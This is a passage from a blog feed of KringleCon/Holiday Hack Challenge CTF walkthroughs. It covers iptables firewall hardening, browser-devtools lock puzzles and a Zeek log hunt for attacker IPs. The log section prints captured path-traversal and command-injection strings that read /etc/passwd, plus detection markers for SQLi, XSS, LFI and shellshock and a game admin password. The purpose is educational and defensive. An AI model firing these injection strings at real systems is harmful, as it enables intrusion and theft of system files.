&lt;/span>&lt;span class="s1">Inner Voice: Very good Kent, that&amp;#39;&lt;/span>s all I needed to know.
Kent TinselTooth: I thought you knew everything?
Inner Voice: Nevermind that. I want you to think about what you&lt;span class="s1">&amp;#39;ve researched and studied. From now on, stop playing with your teeth, and floss more.
&lt;/span>&lt;span class="s1">Kent TinselTooth: Oh no, I sure hope that voice was Santa&amp;#39;&lt;/span>s.
Kent TinselTooth: I suspect someone may have hacked into my IOT teeth braces.
Kent TinselTooth: I must have forgotten to configure the firewall...
Kent TinselTooth: Please review /home/elfuuser/IOTteethBraces.md and &lt;span class="nb">help&lt;/span> me configure the firewall.
Kent TinselTooth: Please hurry&lt;span class="p">;&lt;/span> having this ribbon cable on my teeth is uncomfortable.
elfuuser@b17a1f97bf17:~$ cat /home/elfuuser/IOTteethBraces.md
&lt;span class="c1"># ElfU Research Labs - Smart Braces&lt;/span>
&lt;span class="c1">### A Lightweight Linux Device for Teeth Braces&lt;/span>
&lt;span class="c1">### Imagined and Created by ElfU Student Kent TinselTooth&lt;/span>
This device is embedded into one&lt;span class="err">&amp;#39;&lt;/span>s teeth braces &lt;span class="k">for&lt;/span> easy management and monitoring of dental status. It uses FTP and HTTP &lt;span class="k">for&lt;/span> management and monitoring purposes but also has SSH &lt;span class="k">for&lt;/span> remote access. Please refer to the management documentation &lt;span class="k">for&lt;/span> this purpose.
&lt;span class="c1">## Proper Firewall configuration:&lt;/span>
The firewall used &lt;span class="k">for&lt;/span> this system is &lt;span class="sb">`&lt;/span>iptables&lt;span class="sb">`&lt;/span>. The following is an example of how to &lt;span class="nb">set&lt;/span> a default policy with using &lt;span class="sb">`&lt;/span>iptables&lt;span class="sb">`&lt;/span>:
sudo iptables -P FORWARD DROP
The following is an example of allowing traffic from a specific IP and to a specific port:
sudo iptables -A INPUT -p tcp --dport &lt;span class="m">25&lt;/span> -s 172.18.5.4 -j ACCEPT
A proper configuration &lt;span class="k">for&lt;/span> the Smart Braces should be exactly:
1. Set the default policies to DROP &lt;span class="k">for&lt;/span> the INPUT, FORWARD, and OUTPUT chains.
2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.
3. Create a rule to ACCEPT only remote &lt;span class="nb">source&lt;/span> IP address 172.19.0.225 to access the &lt;span class="nb">local&lt;/span> SSH server &lt;span class="o">(&lt;/span>on port 22&lt;span class="o">)&lt;/span>.
4. Create a rule to ACCEPT any &lt;span class="nb">source&lt;/span> IP to the &lt;span class="nb">local&lt;/span> TCP services on ports &lt;span class="m">21&lt;/span> and 80.
5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.
6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.
elfuuser@b17a1f97bf17:~$
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In order to solve this technical challenge, you need to follow the instructions at the end of the &lt;strong>IOTteethBraces.md&lt;/strong> file and implement the necessary IPTables rules to stop whoever is messing with Kent&amp;rsquo;s smart braces. I found this task to be quite straightforward, so I will just list the necessary commands below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">elfuuser@4f938dab4458:~$ sudo iptables -P INPUT DROP
elfuuser@4f938dab4458:~$ sudo iptables -P OUTPUT DROP
elfuuser@4f938dab4458:~$ sudo iptables -P FORWARD DROP
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -s 172.19.0.225 -p tcp --dport &lt;span class="m">22&lt;/span> -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -p tcp --dport &lt;span class="m">21&lt;/span> -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -p tcp --dport &lt;span class="m">80&lt;/span> -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A OUTPUT -p tcp --dport &lt;span class="m">80&lt;/span> -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -i lo -j ACCEPT
elfuuser@4f938dab4458:~$ Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Finally, the additional hints from Kent are revealed:&lt;/p>
&lt;blockquote>
&lt;p>Oh thank you! It&amp;rsquo;s so nice to be back in my own head again. Er, alone.
By the way, have you tried to get into the crate in the Student Union? It has an interesting set of locks.
There are funny rhymes, references to perspective, and odd mentions of eggs!
And if you think the stuff in your browser looks strange, you should see the page source&amp;hellip;
Special tools? No, I don&amp;rsquo;t think you&amp;rsquo;ll need any extra tooling for those locks.
BUT - I&amp;rsquo;m pretty sure you&amp;rsquo;ll need to use Chrome&amp;rsquo;s developer tools for that one.
Or sorry, you&amp;rsquo;re a Firefox fan?
Yeah, Safari&amp;rsquo;s fine too - I just have an ineffable hunger for a physical Esc key.
Edge? That&amp;rsquo;s cool. Hm? No no, I was thinking of an unrelated thing.
Curl fan? Right on! Just remember: the Windows one doesn&amp;rsquo;t like double quotes.
Old school, huh? Oh sure - I&amp;rsquo;ve got what you need right here..&lt;/p>
&lt;/blockquote>
&lt;h2 id="hodor---main-objective">HODOR!?! - Main Objective&lt;/h2>
&lt;p>To kick off this main objective, let&amp;rsquo;s go over to Shinny by the door to the right and talk with him:&lt;/p>
&lt;blockquote>
&lt;p>Psst - hey!
I&amp;rsquo;m Shinny Upatree, and I know what&amp;rsquo;s going on!
Yeah, that&amp;rsquo;s right - guarding the sleigh shop has made me privy to some serious, high-level intel.
In fact, I know WHO is causing all the trouble.
Cindy? Oh no no, not that who. And stop guessing - you&amp;rsquo;ll never figure it out.
The only way you could would be if you could break into my crate, here.
You see, I&amp;rsquo;ve written the villain&amp;rsquo;s name down on a piece of paper and hidden it away securely!&lt;/p>
&lt;/blockquote>
&lt;p>Next you should click on the crate next to the door, in the corner, and open it in a new tab: &lt;strong>&lt;a href="https://sleighworkshopdoor.elfu.org/">https://sleighworkshopdoor.elfu.org/&lt;/a>&lt;/strong>. This opens a web interface with 10 locks that you need to unlock before the door will open.&lt;/p>
&lt;p>&lt;img src="../images/obj11-locks.png" alt="Crate locks">&lt;/p>
&lt;p>They all look like the one above, and each lock contains a short hint for solving it. As Kent noted, you need to get comfortable with the developer tools of your chosen browser. I use Google Chrome, so this solution will include instructions for that environment.&lt;/p>
&lt;h3 id="lock-1">Lock 1&lt;/h3>
&lt;blockquote>
&lt;p>I locked the crate with the villain&amp;rsquo;s name inside. Can you get it out?&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: Look into the console of your browser and see the code appear there:&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock1.png" alt="Lock1">&lt;/p>
&lt;h3 id="lock-2">Lock 2&lt;/h3>
&lt;blockquote>
&lt;p>Some codes are hard to spy, perhaps they&amp;rsquo;ll show up on pulp with dye?&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: Open print preview, and see the code appear on the page next to the 2nd lock:&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock2.png" alt="Lock2">&lt;/p>
&lt;h3 id="lock-3">Lock 3&lt;/h3>
&lt;blockquote>
&lt;p>This code is still unknown; it was fetched but never shown.&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: Open the Developer tools and check the Network tab for any resources fetched, you will see a png file that holds the code.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock3.png" alt="Lock3">&lt;/p>
&lt;h3 id="lock-4">Lock 4&lt;/h3>
&lt;blockquote>
&lt;p>Where might we keep the things we forage? Yes, of course: Local barrels!&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: A straightforward hint: open the Developer tools, go to Local Storage and look for the code there.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock4.png" alt="Lock4">&lt;/p>
&lt;h3 id="lock-5">Lock 5&lt;/h3>
&lt;blockquote>
&lt;p>Did you notice the code in the title? It may very well prove vital.&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: Hover over the browser tab to reveal its title and the code hiding in its 2nd line. Alternatively, you can check the HTML source and browse to the &lt;code>&amp;lt;title&amp;gt;&lt;/code> element to see the code.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock5.png" alt="Lock5">&lt;/p>
&lt;h3 id="lock-6">Lock 6&lt;/h3>
&lt;blockquote>
&lt;p>In order for this hologram to be effective, it may be necessary to increase your perspective.&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: This was the first lock that was not so straightforward. There is additional help in the clickable hint below the instruction text. Also note the colourful card next to the lock, which already shows some characters. As the hint points out, you need to increase the &lt;code>perspective&lt;/code> CSS property of that element in the styles editor. A value in the thousands should be high enough to make the code on the hologram card readable.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock6.png" alt="Lock6">&lt;/p>
&lt;h3 id="lock-7">Lock 7&lt;/h3>
&lt;blockquote>
&lt;p>The font you&amp;rsquo;re seeing is pretty slick, but this lock&amp;rsquo;s code was my first pick.
In the &lt;code>font-family&lt;/code> css property, you can list multiple fonts, and the first available font on the system will be used.&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: You should check the &lt;code>font-family&lt;/code> property of the text which conveys the hint, and see the code hidden there&amp;hellip;&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock7.png" alt="Lock7">&lt;/p>
&lt;h3 id="lock-8">Lock 8&lt;/h3>
&lt;blockquote>
&lt;p>In the event that the .eggs go bad, you must figure out who will be sad.
Google: &amp;ldquo;[your browser name] view event handlers&amp;rdquo;&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: You need to check the event handlers attached to the &lt;code>.eggs&lt;/code> span in the hint paragraph. One of them hides the code you need.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock8.png" alt="Lock8">&lt;/p>
&lt;h3 id="lock-9">Lock 9&lt;/h3>
&lt;blockquote>
&lt;p>This next code will be unredacted, but only when all the chakras are :active.
It is a css pseudo class that is applied on elements in an active state.
Google: &amp;ldquo;[your browser name] force pseudo classes&amp;rdquo;&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: For this lock, you need to force the &lt;strong>:active&lt;/strong> pseudo-class on all chakra spans, so they each reveal a fragment of the code.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock9.png" alt="Lock9">&lt;/p>
&lt;h3 id="lock-10">Lock 10&lt;/h3>
&lt;blockquote>
&lt;p>Oh, no! This lock&amp;rsquo;s out of commission! Pop off the cover and locate what&amp;rsquo;s missing.&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: For this lock, you need to learn how to drag and drop HTML elements in the DOM tree explorer. Once you locate the &lt;code>&amp;lt;div&amp;gt;&lt;/code> for the lock&amp;rsquo;s cover, move it somewhere else to peek underneath, and notice the code on the right edge of the circuit board. Write it down, then put the cover back and type it in to solve this lock.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock10.png" alt="Lock10">&lt;/p>
&lt;p>However, when you type in the code, double-checked to make sure there are no typos, you will notice that it doesn&amp;rsquo;t unlock. Upon further investigation you will see an error message in the console output:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">899c65f3-6ffa-4b5b-8214-73e08788bc80:1 Error: Missing macaroni!
at HTMLButtonElement.&amp;lt;anonymous&amp;gt; &lt;span class="o">(&lt;/span>899c65f3-6ffa-4b5b-8214-73e08788bc80:1&lt;span class="o">)&lt;/span>
&lt;span class="o">(&lt;/span>anonymous&lt;span class="o">)&lt;/span> @ 899c65f3-6ffa-4b5b-8214-73e08788bc80:1
&lt;/code>&lt;/pre>&lt;/div>&lt;p>So the lock seems to want some &lt;strong>macaroni&lt;/strong>. If you search for it in the HTML page source you will find a div:&lt;/p>
&lt;p>&lt;img src="../images/obj11-macaroni.png" alt="Lock10">&lt;/p>
&lt;p>Drag and drop this into the last lock&amp;rsquo;s div to fix the error. Tip: you will need to do this twice more to fix two errors of the same kind: &lt;code>missing swab&lt;/code> and &lt;code>missing gnome&lt;/code>. Once these errors are fixed you can click UNLOCK and solve the challenge. The answer:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">The Tooth Fairy
&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;img src="../images/obj11-solved.png" alt="Lock10">&lt;/p></description></item><item><title>Acknowledgements</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/conclusion/</link><pubDate>Sun, 10 Jan 2021 20:20:20 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/conclusion/</guid><description>&lt;p>So that&amp;rsquo;s it! I just finished the Holiday Hack Challenge 2020 completely!&lt;/p>
&lt;p>It is an especially rewarding feeling to have pulled this off for the 2nd year in a row. 2020 has been quite an unusual year, to say the least, for various reasons, good and bad. But this CTF at the very end of it is probably one of the most amazing ways to close it off on a positive note.&lt;/p>
&lt;p>Firstly, I would like to thank the folks at CounterHack and the SANS Institute for putting it together. It&amp;rsquo;s been such a tumultuous year, yet they delivered such a high-quality product for us. I am especially impressed by the smooth progression in the difficulty of the objectives, and of course all the creativity that went into creating them. Simply amazing!&lt;/p>
&lt;p>Secondly, I want to say thanks to all the people on Discord who helped me with gentle nudges in desperate times. I probably would have lost much more hair and finished much later if it weren&amp;rsquo;t for you:&lt;/p>
&lt;ul>
&lt;li>&lt;code>joergen&lt;/code>&lt;/li>
&lt;li>&lt;code>shahla&lt;/code>&lt;/li>
&lt;li>&lt;code>john_r2&lt;/code>&lt;/li>
&lt;li>&lt;code>legacyboy&lt;/code>&lt;/li>
&lt;li>&lt;code>tw2k&lt;/code>&lt;/li>
&lt;/ul>
&lt;p>Last but not least, I want to thank my family who allowed me to work on these objectives throughout most of the holiday season&amp;hellip; 😇&lt;/p>
&lt;p>&lt;img src="../images/conclusion/narrative.png" alt="Narrative">&lt;/p>
&lt;p>Already looking forward to what HHC 2021 will have in store!&lt;/p></description></item><item><title>Poisoned Weather Data</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective12/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective12/</guid><description>&lt;h2 id="zeek-no-more">Zeek no more!&lt;/h2>
&lt;p>Instructions in your badge:&lt;/p>
&lt;blockquote>
&lt;p>Use the data supplied in the Zeek JSON logs to identify the IP addresses of attackers poisoning Santa&amp;rsquo;s flight mapping software.
Block the 100 offending sources of information to guide Santa&amp;rsquo;s sleigh through the attack. Submit the Route ID (&amp;ldquo;RID&amp;rdquo;) success value that you&amp;rsquo;re given.
For hints on achieving this objective, please visit the Sleigh Shop and talk with Wunorse Openslae.&lt;/p>
&lt;/blockquote>
&lt;p>Links from hint:&lt;/p>
&lt;ul>
&lt;li>
&lt;a href="https://downloads.elfu.org/http.log.gz" target="_blank" rel="noopener">Zeek logs&lt;/a>&lt;/li>
&lt;li>
&lt;a href="https://srf.elfu.org/" target="_blank" rel="noopener">SRF website&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>Once you enter the Sleigh Shop Door, you will be greeted by this bunch:&lt;/p>
&lt;p>&lt;img src="../images/obj12-room.png" alt="Sleigh Shop">&lt;/p>
&lt;p>The Tooth Fairy greets you with the following:&lt;/p>
&lt;blockquote>
&lt;p>I’m the Tooth Fairy, the mastermind behind the plot to destroy the holiday season.
I hate how Santa is so beloved, but only works one day per year!
He has all of the resources of the North Pole and the elves to help him too.
I run a solo operation, toiling year-round collecting deciduous bicuspids and more from children.
But I get nowhere near the gratitude that Santa gets. He needs to share his holiday resources with the rest of us!
But, although you found me, you haven’t foiled my plot!
Santa’s sleigh will NOT be able to find its way.
I will get my revenge and respect!
I want my own holiday, National Tooth Fairy Day, to be the most popular holiday on the calendar!!!&lt;/p>
&lt;/blockquote>
&lt;p>Not a very good sign, but all is not lost yet. You should turn to Wunorse Openslae for some hints on defeating the Tooth Fairy; however, he has a technical task for you first:&lt;/p>
&lt;blockquote>
&lt;p>Wunorse Openslae here, just looking at some Zeek logs.
I&amp;rsquo;m pretty sure one of these connections is a malicious C2 channel&amp;hellip;
Do you think you could take a look?
I hear a lot of C2 channels have very long connection times.
Please use jq to find the longest connection in this data set.
We have to kick out any and all grinchy activity!&lt;/p>
&lt;/blockquote>
&lt;p>Next, you open the terminal and get to work:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">Some JSON files can get quite busy.
There&lt;span class="s1">&amp;#39;s lots to see and do.
&lt;/span>&lt;span class="s1">Does C&amp;amp;C lurk in our data?
&lt;/span>&lt;span class="s1">JQ&amp;#39;&lt;/span>s the tool &lt;span class="k">for&lt;/span> you!
-Wunorse Openslae
Identify the destination IP address with the longest connection duration
using the supplied Zeek logfile. Run runtoanswer to submit your answer.
elf@3222ffd89de4:~$ ls
conn.log
elf@3222ffd89de4:~$ cat conn.log &lt;span class="p">|&lt;/span> wc -l
&lt;span class="m">143679&lt;/span>
elf@3222ffd89de4:~$
&lt;/code>&lt;/pre>&lt;/div>&lt;p>As you can see, it is a rather large log file, so you should use jq to parse it. Since you are interested in the IP belonging to the connection with the longest duration, you should extract that field, then pipe the output through some Unix tools to find the highest value. Next, run jq once more to find the IP that belongs to this highest duration:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">elf@3222ffd89de4:~$ cat conn.log &lt;span class="p">|&lt;/span> jq &lt;span class="s2">&amp;#34;.duration&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> uniq &lt;span class="p">|&lt;/span> sort -g &lt;span class="p">|&lt;/span> tail -n &lt;span class="m">1&lt;/span>
1019365.337758
elf@3222ffd89de4:~$ cat conn.log &lt;span class="p">|&lt;/span> jq &lt;span class="s2">&amp;#34;. | select (.duration == 1019365.337758)&amp;#34;&lt;/span>
&lt;span class="o">{&lt;/span>
&lt;span class="s2">&amp;#34;ts&amp;#34;&lt;/span>: &lt;span class="s2">&amp;#34;2019-04-18T21:27:45.402479Z&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;uid&amp;#34;&lt;/span>: &lt;span class="s2">&amp;#34;CmYAZn10sInxVD5WWd&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;id.orig_h&amp;#34;&lt;/span>: &lt;span class="s2">&amp;#34;192.168.52.132&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;id.orig_p&amp;#34;&lt;/span>: 8,
&lt;span class="s2">&amp;#34;id.resp_h&amp;#34;&lt;/span>: &lt;span class="s2">&amp;#34;13.107.21.200&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;id.resp_p&amp;#34;&lt;/span>: 0,
&lt;span class="s2">&amp;#34;proto&amp;#34;&lt;/span>: &lt;span class="s2">&amp;#34;icmp&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;duration&amp;#34;&lt;/span>: 1019365.337758,
&lt;span class="s2">&amp;#34;orig_bytes&amp;#34;&lt;/span>: 30781920,
&lt;span class="s2">&amp;#34;resp_bytes&amp;#34;&lt;/span>: 30382240,
&lt;span class="s2">&amp;#34;conn_state&amp;#34;&lt;/span>: &lt;span class="s2">&amp;#34;OTH&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;missed_bytes&amp;#34;&lt;/span>: 0,
&lt;span class="s2">&amp;#34;orig_pkts&amp;#34;&lt;/span>: 961935,
&lt;span class="s2">&amp;#34;orig_ip_bytes&amp;#34;&lt;/span>: 57716100,
&lt;span class="s2">&amp;#34;resp_pkts&amp;#34;&lt;/span>: 949445,
&lt;span class="s2">&amp;#34;resp_ip_bytes&amp;#34;&lt;/span>: &lt;span class="m">56966700&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>To submit the answer execute the &lt;strong>runtoanswer&lt;/strong> command on the terminal:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">elf@3222ffd89de4:~$ runtoanswer
Loading, please wait......
What is the destination IP address with the longes connection duration? 13.107.21.200
Thank you &lt;span class="k">for&lt;/span> your analysis, you are spot-on.
I would have been working on that &lt;span class="k">until&lt;/span> the early dawn.
Now that you know the features of jq,
You&lt;span class="err">&amp;#39;&lt;/span>ll be able to answer other challenges too.
-Wunorse Openslae
Congratulations!
&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="fixing-the-weather">Fixing the weather&lt;/h2>
&lt;p>So now you can attack the final objective, and you also get some encouraging words from Krampus in the room:&lt;/p>
&lt;blockquote>
&lt;p>But there’s still time! Solve the final challenge in your badge by blocking the bad IPs at srf.elfu.org and save the holiday season!&lt;/p>
&lt;/blockquote>
&lt;p>Go to link:
&lt;a href="https://srf.elfu.org/" target="_blank" rel="noopener">SRF&lt;/a>&lt;/p>
&lt;p>However, you notice that the website needs credentials before you can access it. Luckily, you remember the &lt;strong>Elfscrow&lt;/strong> objective and the pdf document you successfully recovered, which contained some good clues for how this can be achieved:&lt;/p>
&lt;p>&lt;img src="../images/obj12-srf.png" alt="SRF document">&lt;/p>
&lt;p>Link to the readme file:
&lt;a href="https://srf.elfu.org/README.md" target="_blank" rel="noopener">here&lt;/a> and the credentials inside:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="c1">#### Logging in:&lt;/span>
You can login using the default admin pass:
&lt;span class="s1">&amp;#39;admin 924158F9522B3744F5FCD4D10FAC4356&amp;#39;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>After logging in, you can scroll down to see the Firewall section, which is where you will need to enter the IP addresses which you think are malicious, based on your analysis.&lt;/p>
&lt;p>&lt;img src="../images/obj12-firewall.png" alt="SRF document">&lt;/p>
&lt;h2 id="weed-out-the-bad-ips">Weed out the bad IPs!&lt;/h2>
&lt;p>In order to find the list of IP addresses (around 100 in total, as pointed out in the objective) you need to download the Zeek logs from
&lt;a href="https://downloads.elfu.org/http.log.gz" target="_blank" rel="noopener">here&lt;/a>, and run your analysis on them. At this point it is worth going back to Wunorse to hear his hints for the analysis task:&lt;/p>
&lt;blockquote>
&lt;p>That&amp;rsquo;s got to be the one - thanks!
Hey, you know what? We&amp;rsquo;ve got a crisis here.
You see, Santa&amp;rsquo;s flight route is planned by a complex set of machine learning algorithms which use available weather data.
All the weather stations are reporting severe weather to Santa&amp;rsquo;s Sleigh. I think someone might be forging intentionally false weather data.
I&amp;rsquo;m so flummoxed I can&amp;rsquo;t even remember how to login!
Hmm&amp;hellip; Maybe the Zeek http.log could help us.
I worry about LFI, XSS, and SQLi in the Zeek log - oh my!
And I&amp;rsquo;d be shocked if there weren&amp;rsquo;t some shell stuff in there too.
I&amp;rsquo;ll bet if you pick through, you can find some naughty data from naughty hosts and block it in the firewall.
If you find a log entry that definitely looks bad, try pivoting off other unusual attributes in that entry to find more bad IPs.
The sleigh&amp;rsquo;s machine learning device (SRF) needs most of the malicious IPs blocked in order to calculate a good route.
Try not to block many legitimate weather station IPs as that could also cause route calculation failure.
Remember, when looking at JSON data, jq is the tool for you!&lt;/p>
&lt;/blockquote>
&lt;p>He provides some very useful hints about
&lt;a href="https://highon.coffee/blog/lfi-cheat-sheet/" target="_blank" rel="noopener">LFI&lt;/a>,
&lt;a href="https://labs.detectify.com/2012/11/07/how-to-exploit-an-xss/" target="_blank" rel="noopener">XSS&lt;/a>,
&lt;a href="https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/" target="_blank" rel="noopener">SQLi&lt;/a> and
&lt;a href="https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/" target="_blank" rel="noopener">Shell&lt;/a> exploits. In order to try to uncover the IP addresses that originate such attacks, I wrote a custom python script, which parsed the Zeek logs looking for signs of such exploits. More specifically for each category of exploits I looked for:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">SQLi &amp;gt; presence of &lt;span class="s1">&amp;#39; in uri, username or user_agent fields
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">XSS &amp;gt; presence of &amp;lt; in uri or host fields
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">LFI &amp;gt; presence of /passw in uri field
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">Shell &amp;gt; presence of &amp;#39;&lt;/span>:&lt;span class="p">;&lt;/span>&lt;span class="s1">&amp;#39; or &amp;#39;&lt;/span>&lt;span class="o">}&lt;/span>&lt;span class="p">;&lt;/span>&lt;span class="err">&amp;#39;&lt;/span> in user_agent field
&lt;/code>&lt;/pre>&lt;/div>&lt;p>As an example, if I did a quick and dirty search for LFI exploits via cat and JQ:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">cat http.log &lt;span class="p">|&lt;/span> jq &lt;span class="s1">&amp;#39;.[] | .uri&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> grep /passw
&lt;span class="s2">&amp;#34;/api/weather?station_id=\&amp;#34;/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/weather?station_id=../../../../../../../../../../bin/cat /etc/passwd\\\\x00|&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/stations?station_id=|cat /etc/passwd|&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/weather?station_id=;cat /etc/passwd&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/password/&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/login?id=cat /etc/passwd||&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/weather?station_id=`/etc/passwd`&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/weather?station_id=/../../../../../../../../../../../etc/passwd&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/gtcatalog/password.inc&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/gtcatalog/password.inc&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/login?id=/../../../../../../../../../etc/passwd&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/password-manager-master/beta/index.html&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/weather?station_id=/../../../../../../../../etc/passwd&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/weather?station_id=/etc/passwd&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/files/passwd.txt&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/scripts/files/passwd.txt&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/guestbook/files/passwd.txt&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/login?id=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd&amp;#34;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This search quickly revealed some requests trying to gain access to the &lt;strong>passwd&lt;/strong> file. Next, I took the specified search criteria and implemented them in a Python script.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="n">ips_blacklist&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">set&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="c1"># collection of IP addresses deemed to be malicious&lt;/span>
&lt;span class="c1"># load the json into logs object&lt;/span>
&lt;span class="n">logs&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">json&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">load&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nb">open&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;http.log&amp;#34;&lt;/span>&lt;span class="p">))&lt;/span>
&lt;span class="c1"># iterate over entries and filter based on identified markers of IoC&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">log&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">logs&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;&amp;#39;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;&amp;#39;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;username&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span>
